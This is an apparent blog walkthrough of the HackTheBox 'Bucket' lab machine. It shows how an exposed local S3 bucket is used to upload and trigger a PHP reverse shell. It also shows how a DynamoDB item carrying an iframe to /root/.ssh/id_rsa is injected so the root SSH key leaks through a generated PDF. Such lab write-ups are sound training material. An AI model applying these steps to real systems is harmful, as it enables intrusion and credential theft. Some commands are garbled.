Hackthebox: Bucket Machine Walkthrough – Medium Difficulty

In this post, i would like to share walkthrough on Bucket Machine.

This room is been considered difficulty rated as Medium machine

Information Gathering

Once we have started the VPN connection, we can start information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 

Let’s see what’s stored in website interface.

Let’s look into the source of the web page.

We have aware that’s another url that we can use

Scanning Process

We can see that the url is valid. So, let’s run the gobuster in order to get

From the result output, we notice that there’s /health/ directory that been deployed there.

Nothing that we can look over here. After a while, we get another directory on gobuster output. So, let’s check it.

Now, we know that system is using Amazon Web Services or also known as aws.

Tools use: Installing AWScli

We need to install AWScli in order to play with the machine.

We will execute the command sudo apt update && apt install awscli

AWS Configurations

Now we can try to gaining access to the machine via reverse shell.

Before we can get the reverse shell, aws configure will need to setup first.

We don’t have to key-in the real key because this is for HTB room purpose.

We can run the command aws dynamodb list-tables –endpoint-url http://s3.bucket.htb

Oh wait! We got an error with the command and we found out that the command will need execute with root privilege.

We need to know any available tables in the machine and we found nothing.

We don’t have any use for those information for now. But we will coming back here when needed later on.

aws –endpoint-url http://s3.bucket.htb. s3 ls

When we execute the command sudo aws –endpoint-url http://s3.bucket.htb. s3 ls, we did notice that adserver directory is there for some reason.

Let’s check what have been stored in that directory by execute sudo aws –endpoint-url http://s3.bucket.htb. s3 ls s3://adserver

There’s a website file such as index.html been stored in the directory. I have been thinking that maybe we can upload any file into the directory.

Let’s upload php reverse shell inside.

I have modify the name of file and we are set with the php reverse shell.

We have successfully upload the shell into the aws environment.

We have to start the netcat listener in order to get reverse shell connection back us.

We will use curl function to run the shell from the target’s machine. The command for this is curl http://bucket.htb/<php reverse shell filename> &> /dev/null

As you can see the screenshot above, we get a simple shell to play with..

Let’s upgrade the shell

For us to gain a upgrade shell, we need to use the following step

  1. Python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
  2. control z
  3. stty raw -echo; fg
  4. export TERM=xterm

Retrieve User Flag

Once upgrading the shell completed, we need to find a valid user to gain the user flag

We found out that roy can be considered as valid user on the system

Let’s switch the current privileges(www-data) to roy privileges by running the command su roy. The password can be found within the configuration that we execute earlier.

We have successfully login as roy when we insert the correct password

We got user Flag when we read the user.txt at /home/roy directory

Retrieve Root Flag (Pretty Hard!)

Firstly, we nee to check the connection that the machine hold so that we can verify which port can be used for our next step

We notice that port 8000 is listening and so we need to look deep into the code by running curl http://localhost:8000

We can run the command such as head 30 index.php for a code understanding

It does look clean to read, right?

For the next step, we need to execute it quickly where the machine will cleaning everything in the machine(auto-delete) every 30 seconds.

I will post the command that will use so that it will be easier for you guys.

aws dynamodb create-table \    
 --table-name alerts \ 
 --attribute-definitions \         
AttributeName=title,AttributeType=S \         AttributeName=data,AttributeType=S \   
 --key-schema \
 AttributeName=title,KeyType=HASH \         AttributeName=data,KeyType=RANGE \ 
--provisioned-throughput \         ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://s3.bucket.htb
 aws dynamodb put-item \
--table-name alerts \
--item '{"title": {"S": "Ransomware"}, "data": {"S": "<html><head></head><body><iframe src='/root/.ssh/id_rsa'></iframe></body></html>"}       }' \
 --return-consumed-capacity TOTAL --endpoint-url http://s3.bucket.htb
curl --data "action=get_alerts" http://localhost:8000/
scp roy@$bucket.htb://var/www/bucket-app/files/result.pdf ./

If we don’t get the result.pdf, then you are not quick enough.

Please try faster!

For those received the result.pdf, congratulations for that. Let’s open the PDF file and there’s ssh id_rsa key stored inside the PDF file.

We need to copy-paste the ssh key into a simple file on your attacker’s machine. We can access the machine with root privileges via ssh service

As usual, we need to access /root/ directory so that we can retrieve the root flag

-THE END-

Happy Learning Guys!

Leave a Reply

Your email address will not be published. Required fields are marked *